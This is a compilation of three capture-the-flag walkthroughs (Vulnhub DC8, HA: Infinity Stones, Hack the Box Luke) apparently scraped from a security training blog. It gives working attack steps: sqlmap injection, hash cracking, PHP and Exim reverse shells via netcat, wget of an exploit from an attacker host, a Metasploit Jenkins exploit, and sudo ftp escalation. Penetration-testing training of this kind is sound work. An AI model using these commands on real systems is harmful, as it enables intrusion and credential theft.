DC8: Vulnhub Walkthrough

DC8 VM is made by DCAU. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read a flag.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

netdiscover

nmap port scan

Enumeration

Browsing HTTP Service

SQL Injection for finding Credentials

Performing Directory Bruteforce

Exploiting

Editing Access given to user

Privilege Escalation

Exim

Capture the flag

Walkthrough

Network Scanning

The first step to attack is to identify the target. So, identify your target. To identify the target, we will use the following command:

netdiscover

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.0.6

We learned from the scan that we have the port 80 open which is hosting Apache httpd service with Drupal 7, and we have the port 22 open. This tells us that we also have the OpenSSH service running on the target machine.

Enumeration

Further, we need to start enumeration against the host machine, therefore we navigated to a web browser for exploring HTTP service, and DC:8- Welcome page will be opened in the browser. We enumerated the links provided on left. They seemed a bit fishy.

We enumerated these links to find an SQL related Errors. So we used the single quote(‘) to get an error message. We will enumerate this error further.

After some enumeration and poking around, we realised it is definitely SQL Error. We decided to run the sqlmap against the target machine. Here, we set the risk at 3 and level at 5. This is the option we got the best results in the least time.

sqlmap -u 192.168.0.6/?nid=2 --dbs --batch --risk 3 --level 5

After working for some time our sqlmap gave us the some important information. It showed us that there are 2 available databases in target machine which are:

1.      d7db

2.      information_schema

Now that we got the database named ‘d7db’, it’s time to further enumerate this database. We re-constructed our sqlmap script with parameters like [--tables] [--batch]. This helps us to enumerate the tables inside the database. 

sqlmap -u 192.168.0.6/?nid=2 -D d7db --tables --batch --risk 3 --level 5

This gave us very large number of tables. We went through it with a keen eye. We found a table named ‘users’. This is definitely worth looking into.

Our reliable sqlmap provided us with further more details like we get the following details:

uid	name	init	Pass
1	admin	dc8blah@dc8blah.org	$D2tRcYRyqVFNSCONVYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
2	john	john@blahsdfsfd.org	$S$DqupvJbxVmqj r6cYePnx2A8911Ln7lsuku/3if/oRVZJaz5mKC2vF

So, we got hashes. Whenever we get some hashes all we remember is our best friend John The Ripper. The hashes were saved in a file named ‘hash’. We ran it through john. After working on it for some time. John cracked one of the hashes, it came out to be ‘turtle’.

john hash

This seemed as some information that might be useful somewhere else further down the road. For now, let’s try Directory Bruteforce using dirb. This surprisingly gave us a page with the name ‘user’.

dirb http://192.168.0.6

On opening the page in our browser, we saw that it requires some login credentials. We found some credentials in our exploitation of SQL Injection. We logged in this panel using the following credentials:

Username: john

Password: turtle

After logging in it was time to look around and try different options. While enumerating we stumbled upon Form settings. Let’s take a closer look on it.

Here we saw that we had an option to change the text format. We changed it to PHP code. This revealed the php code in the webpage. We edited this page with our php reverse shell so as to generate a shell over the target machine.

Now that we have edited out php code, we also started a netcat listener to receive a shell that would be generated on the execution of our php reverse shell script.

nc -lvp 1234

Now to submit the form with our php reverse shell script, we would have to enter some of these mandatory data. This details can be anything but they should support the format of the data supposed to be entered.

After typing in all that information, we clicked on the submit button. After few seconds, we got the shell from the target machine. It was a shell of user ‘www-data’. This was an improper shell. So, in order to convert in into a proper shell, we ran the python one liner mentioned below.

After getting a proper shell, it was a time to escalate privilege on this machine. So, to do that we ran the find command to find the files with the SUID permissions. We found a service named exim4. Now, in order to proceed further we are going to need the version of the exim4 tool. It will help us in searching for some exploit on the internet. This was found to be 4.89.

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@dc-8:/$ find / -perm -u=s -type f 2>/dev/null

www-data@dc-8:/$ exim --version | head -1

We surfed the web for an exploit regarding exim tool of version 4.89. ExploitDB came up with the rescue. It gave us this Local Privilege Escalation exploit. We examined it carefully.

Firstly, we traversed into the /tmp directory, because we need to transfer a file and /tmp directory has the writable permission. We downloaded it into our attacker machine i.e Kali Linux and renamed it raptor_exim_wiz.sh. We edited our IP address and the port which we will be using to capture the netcat session. After that we created a server on the Kali Linux to send the file directly to the target machine. We used the wget command for this transfer. After transferring the script on the target machine, we gave it proper permissions so that it can execute properly.

www-data@dc-8:/tmp$ wget http://192.168.0.8:8000/raptor_exim_wiz.sh

www-data@dc-8:/tmp$ chmod 777 raptor_exim_wiz.sh

After providing with the proper permissions, it’s time to run a listener so that we can capture the shell which would be generated by this script. After that, we ran the command with the option to invoke netcat as shown in the image given below. This script invoked a netcat shell to our attacker machine on port 4444.

nc -lvp 4444

www-data@dc-8:/tmp$ ./raptor_exim_wiz.sh -m netcat

We successfully got the shell on the target machine. On running the whoami command, we got a satisfactory response of ‘root’. We traversed into root directory using the cd command. We found our flag at this location.

whoami

cd /root

ls

cat flag.txt

HA: Infinity Stones Walkthrough

Today we are going to solve our CTF challenge called “HA: Infinity Stones” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it

Level: Intermediate

Task: Find 6 Flags on the victim’s machine.

Penetration Methodology

Scanning

Netdiscover

Nmap

Enumeration

Directory Scanning using DIRB

Exploitation

Privilege Escalation

Getting SUID File

Capturing the flag

Walkthrough

First of all we try to identify our target and for this use the following command:

netdiscover

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.0.4

With the help of help scan, we now know that port number 22, 80, 443, 8080 are open with the service of SSH, HTTP, HTTPS, HTTP respectively. Now that port 80 is open we open the target IP address in our browser as shown in the following image :

It opened a webpage as shown in the above image. But as resulted in the nmap scanning port 8080 is also open, so now we opened our target IP with port 8080 and found a log in page there as shown in the image below :

Now that we do not have log in credentials, we explored using dirb in order to find directories, and in the result of dirb, we found two important directories i.e. /img and /wifi as shown in the image below :

First of them, we opened, /img directory and there was a space.jpg we found there.

When opened this image was of tesseract. Nothing else in the image as you can see in the image below :

But if you remember, space stone was inside the tesseract, so we used exif tool to see if there was metadata stored in the image. And for this use the following command :

exiftool space.jpg

And so, as you can see in the image below, our doubt was correct, because here we found our first flag i.e. spacestone. Now our infinity gauntlet is missing five more stones (flags). Let’s try and find them.

Our target also has port 443 open, which means there is a webpage on https, lets try and open it. When you open the target IP on port 443, it shows something is not right with the SSL certificate which you can in the image below too :

Click on that lock icon and navigate yourself to its security as shown in the image below, as here you will find your second stone i.e. Mind stone. Four more stones to collect for there to be perfect balance.

If you remember, with the /img directory we also found /wifi directory. So now let’s traverse through that.

Upon opening the said directory, we found two things i.e. pwd.txt and reality.cap. First, we downloaded pwd.txt to see what it had to offer. Use the following command to download it :

wget http://192.168.0.4/wifi/pwd.txt

Once downloaded, we read the pwd.txt file using the cat command. And it said “Your Password is thanos daughter name “gam” (note it’s all lower case) plus the following I enforced new requirement on you…12 characters

One uppercase character

Two numbers

Two lowercase

The year of the first avengers movie came out in theaters”

Now that we know password the format of password so we will use crunch to make a wordlist for all the possible password combinations with the following command :

crunch 12 12 -t gam,%%@@2012 -o dict.txt

Now, the other file which we found was reality.cap so while examining that file, we found wifi packets in it. So, we used aircrack-ng and used our crunch created password list to find the wifi key. And voila! We found our wifi key as shown in the image below :

We used this wifi key as a directory and we found a realitystone.txt which further lead us to our reality stone. Three stones down, three more to go.

Now, for the next stone, we opened the target IP on the 443 port; it had a redirecting link on the top right side. Upon clicking on the link, we are redirected to a page where there is quiz about avengers, and also some hint related to binary. As shown in the image below :

Upon solving the quiz, we had got following answers with their corresponding binary value :

S.No.	Questions	Answers	Binary Value
1.	In the beginning, there are 3 infinity stones on earth.	False	0
2.	At the end, there are two survivors on Titan.	True	1
3.	Thanos already had the power stone when he first appeared.	True	1
4.	Tesseract contains the reality stone.	False	0
5.	The dwarf on Ndavellir is played by Peter Dinklage	True	1
6.	Red skull is the guardian of space stone.	False	0
7.	Thor’s new hammer is called stormbuster.	False	0
8.	Rocket is the only Gaurdian of the Glaxy to survive the snap.	True	1

After solving the quiz and identifying their binary values, we had a binary string i.e. 01101001. We opened this string of binary characters through the URL and there was a hints.txt and further opened it and found text encrypted through brainfuck algorithm.

So further, we decrypted the cipher text and got its value as admin:avengers. Here, huge possibility is that this can be log in credentials which can be used on the log in page that we found on 8080.

As deduced above, we logged in by using the above founded credentials and were welcomed with the following page :

The webpage has used Jenkins framework and it is commonly known for its vulnerability as in Metasploit there is an affective exploit for it. Therefore, we will use the following exploit and so, open Metasploit in kali and the following set of commands :

use exploit /multi/http/jenkins_script_console

set target 1

set rhosts 192.168.0.4

set username admin

set password avengers

set targeturi /

exploit

Once the exploit is executed, you will have a meterpreter session. And when you try to have shell by using the simple “shell” command but an improper shell session will be opened. To get a proper shell use the following command :

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Now that we have proper shell, we tried to look for the files which had SUID bits set on them and for that we used the following command :

find / -perm -u=s -type f 2>/dev/null

After running the above command, we had a list and we enumerated through them one by one. Although the one that stood out was /opt/script. And the one that had our next stone i.e. time stone was /opt/script only as shown in the following image :

As we found our fourth stone in the /opt/script we decided to explore /opt a bit more. And for that we used following set of commands :

cd /opt

ls

The above commands allowed us to see the contents of /opt and there we found morag.kdbx. now this morag.kdbx is important for two reasons i.e. there was a planet named morag in avengers series and .kdbx tells us that it might have password key database.

So we decided to open and we met with the following dialogue box :

As we didn’t knew the ‘master password’, we decided to run a python script which created the key hash and then with the additional help of john the ripper we cracked the password and to do so, type :

python keepass.py morag.kdbx > hash

john hash

And as you can see in the image above, the master password is princesa. When entered this password, we found one enter on the flag tab which is powerstone. And so we found our fifth and second last stone/flag as shown in the image below :

Another tab, just below flags, is cred in the morag.kdbx password key database. When opened, it contained a base64 string as shown in the image below :

So we decoded the string using the following echo command :

echo “bW9yYWc6eW9uZHU=” | base64 -d

The string was then decoded to plain text i.e. morag:yondu, just like in the image below :

We have found five stones till now using each port except SSH. And the above decoded string can be our log in credentials to log in through SSH. Therefore, we tried it using the following command :

ssh morag@192.168.0.4

And then, when further asked for password type ‘yondu’ and so you are logged in just as shown in the image below :

After loggin in through SSH, we used ‘sudo -l’ command to see which user had no password and the result was : /usr/bin/ftp.  So we switched the user to ftp and further accessed root to find our final flag by using the following set of commands :

sudo ftp

!/bin/bash

cd/root

ls

cat final.txt

And so, we have found all the six stones aka flags and with just a snap there can be perfect balance in the universe.

Hack the Box Luke Walkthrough

Hello! Everyone and Welcome to yet another CTF challenge from Hack the Box, called ‘Luke,’ which is available online for those who want to increase their skills in penetration testing and Black box testing. Luke is a retired vulnerable lab presented by Hack the Box for making online penetration testing practice suitable to your experience level; they have a large collection of vulnerable labs as challenges ranging from beginner to expert level.

Level: Easy

Task: Find user.txt and root.txt in the victim’s machine

Penetration Methodologies

Scanning

    Nmap

Enumeration

    Logging in FTP as anonymous

    Browsing HTTP service

    Directory Scanning using Dirsearch

Exploitation

    Extracting Authentication token using curl   

    Extracting User information using curl

    Extracting Password using curl

Privilege Escalation

    Logging in Ajenti Panel

Capturing the flag

Walkthrough

Network Scanning

Let’s get started then!

Since these labs have a static IP, the IP address for Luke is 10.10.10.137. Let us scan the VM with the most popular port scanning tool, nmap.

nmap -A 10.10.10.137

From the result above we found five working ports on the VM, port 21, 22, 80, 3000, 8000.

Here, we can saw that FTP allow anonymous login. So, we check it.

ftp 10.10.10.137

ftp> ls

ftp> cd webapp

ftp> ls

ftp> get for_Chihiro.txt

Through FTP login we found a for_Chihiro.txt file, where Chihiro or Derry might be usernames.

cat for_Chihiro.txt

We found that the HTTP service runs on port 80, from nmap results. So, we browse the IP address of Target in the browser. We found a simple HTML page.

We also started a Directory Bruteforce in order to enumerate the machine further. This gave us some directories and files namely config.php, management etc.

./dirsearch.py -u http://10.10.10.137 -e php -x 400, 403, 404

We enumerated all of them. Among which config.php gave us some database credentials as shown in the image below.

We tried credentials on 10.10.10.137/management. But it gave back an unauthorized error. We will come back to it again.

Back to our nmap scan, we found that a Nodejs service running on port 3000. On browsing the IP Address with 3000 port, we got a message that says that auth token is not supplied.

We further did a Directory Bruteforce on port 3000. We found pages named /login and /users.

./dirsearch.py -u http://10.10.10.137:3000 -e php -x 400, 403, 404

After a bit of research, we can use curl command to authenticate JWT token. For more you can read this article from here.

The trick part here is the username is admin and not root which we guessed.

So, the curl command with the admin as username and password we got earlier.

curl --header "Content-Type: application/json" --request POST --data '{"username":"admin", "password":"Zk6heYCyv6ZE9Xcg"}' http://10.10.10.137:3000/login

This gave us the auth token.

We enumerated usernames using the curl command with the help of the Authentication token we found earlier. This gave use users information as shown in the image given below.

curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310' http://10.10.10.137:3000/users

We enumerated all users using the curl command. This gave use password for those users as shown in the image given below.

curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310’ http://10.10.10.137:3000/users/Derry

We logged in the management page successfully using the credentials of user Derry.

User Name: Derry

Password rZ86wwLvx7jUxtch

After logging in we found a files named config.json, config.php and login.php. We enumerated all these files among which config.json seemed intresting.

The config.json file had some information related to ‘ajenti’ service running on port 8000 and a password.

We browsed the IP Address with the port 8000, It gave us another login form. We used the following credentials into the form. This successfully gave us the ajenti panel as shown in the image given below:

Username: root

Password: KpMasng655EtTy9Z

After Enumerating a bit, we saw the option to open terminal. On opening the terminal, we checked the user and group details using id command. It is root shell. Here we enumerated the shell for user and root flags.

Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles. Contact here.